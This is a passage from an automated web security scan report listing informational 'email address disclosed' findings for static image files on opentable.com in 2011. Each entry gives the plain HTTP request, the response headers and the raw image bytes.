Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1013
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:47 GMT

GIF89ay.C.............................:4....PH.......<6.wlf.....................................v..f.........!.......,....y.C.....'.di.'@LS..],.......|....*0+....!.l:..    rJENt..6K.z.2.vL...hjy..e4....i
...[SNIP]...

8.131. http://www.opentable.com/img/themes/normal/cnr_paleyellow_tl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/normal/cnr_paleyellow_tl.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/normal/cnr_paleyellow_tl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 111
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:41 GMT

GIF89a
.
........u....................v.....................!.......,....
.
....0H)L.`...LC.!G(b.wb....v.tD.;

8.132. http://www.opentable.com/img/themes/normal/cnr_paleyellow_tr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/normal/cnr_paleyellow_tr.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/normal/cnr_paleyellow_tr.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 111
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:43 GMT

GIF89a
.
........u..........................................!.......,....
.
......dJ.W.A....}...[.j.*....4...;

8.133. http://www.opentable.com/img/themes/normal/table-head-gradient-gray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/normal/table-head-gradient-gray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/normal/table-head-gradient-gray.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3671
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:37 GMT

.PNG
.
...IHDR.......L......-    ...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.134. http://www.opentable.com/img/themes/white/rest_profile_tabs.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/white/rest_profile_tabs.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/white/rest_profile_tabs.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1177
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:56 GMT

.PNG
.
...IHDR.............e${N....tEXtSoftware.Adobe ImageReadyq.e<....PLTE..........................................................................................................................
...[SNIP]...

8.135. http://www.opentable.com/img/themes/white/table-head-gradient-gray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/white/table-head-gradient-gray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/white/table-head-gradient-gray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 319
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:57 GMT

.PNG
.
...IHDR.......L......-    ....tEXtSoftware.Adobe ImageReadyq.e<...{PLTE..........................................................................................................................
...[SNIP]...

8.136. http://www.opentable.com/img/themes/white/toplinecurve_980.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/themes/white/toplinecurve_980.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/themes/white/toplinecurve_980.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3892
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

GIF89a...................!.......,.............................H...........q..........
.....L*....    .J......j......".....N.........:U.........(8HXhxx.........)9IY.X........    jw.JZjz.....7..
.+;K[[.j...
...[SNIP]...

8.137. http://www.opentable.com/img/topten/Sprite_RatingStars_0-5.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/topten/Sprite_RatingStars_0-5.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/topten/Sprite_RatingStars_0-5.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1333
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:50 GMT

.PNG
.
...IHDR...6...7.......B....~PLTE.D#.P1.[?.gL.sZ.h..v..........................................................................................................rf...*tRNS.....................
...[SNIP]...

8.138. http://www.opentable.com/info/restaurateurs/img/arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/arrow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/arrow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 56
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:04 GMT

GIF89a......._JEXM9......!.......,..........    .a)!..P...;

8.139. http://www.opentable.com/info/restaurateurs/img/common/1x1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/common/1x1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/common/1x1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:02 GMT

GIF89a.............!.......,...........D..;

8.140. http://www.opentable.com/info/restaurateurs/img/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/loadingAnimation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/loadingAnimation.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 5886
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:44 GMT

GIF89a......................................................................................................!..NETSCAPE2.0.....!...
...,.......... .@Ri.h..l..p,.tm..#6N......+.r..rD4...h..@F.Cj.z]L.
...[SNIP]...

8.141. http://www.opentable.com/info/restaurateurs/img/restjoinus/btn_contactus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/btn_contactus.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/btn_contactus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 265
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:05 GMT

GIF89a~......................61......!.......,....~..........0.I.......`(.di.h.-...p,.tm.x../....p.......e........J].).*.n..m5.M6.\.5.M.cn......d3.....ryuw4qb..Gg?..omp~T.2..YJ.<.dkb~ru..v.c^H.;....w
...[SNIP]...

8.142. http://www.opentable.com/info/restaurateurs/img/restjoinus/btn_download.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/btn_download.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/btn_download.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 265
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:03 GMT

GIF89a~.......61.....................!.......,....~......H...0.I...)...`(.di.h.-...p,.tm.x../....p.......e.....4..Z..,LK.NePox9h
.U...^s..,...v.x.9.~...xcqy..Q}I{@.yw.Xl.....j...-D..nS.t~^....K.?..io
...[SNIP]...

8.143. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_lowerleft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/contactcorner_lowerleft.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/contactcorner_lowerleft.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 104
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:05 GMT

GIF89a.......................................................!.......,.............II.s...8...W'....l..;

8.144. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_lowerright.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/contactcorner_lowerright.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/contactcorner_lowerright.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 105
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:04 GMT

GIF89a.......................................................!.......,...........PI.....D.,.w....dhta...;

8.145. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_upperleft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/contactcorner_upperleft.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/contactcorner_upperleft.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 105
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:03 GMT

GIF89a.......................................................!.....
.,...........PI9...%)L.....6*...j...;

8.146. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_upperright.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/contactcorner_upperright.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/contactcorner_upperright.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 104
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:04 GMT

GIF89a.......................................................!.......,...........p...!T.T.....Z....*F..;

8.147. http://www.opentable.com/info/restaurateurs/img/restjoinus/overview.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/overview.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /info/restaurateurs/img/restjoinus/overview.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 18828
Content-Type: image/jpeg
Last-Modified: Fri, 23 Sep 2011 02:10:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:02 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

8.148. http://www.opentable.com/info/restaurateurs/img/restjoinus/whitedots_278.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/restaurateurs/img/restjoinus/whitedots_278.gif

Issue detail

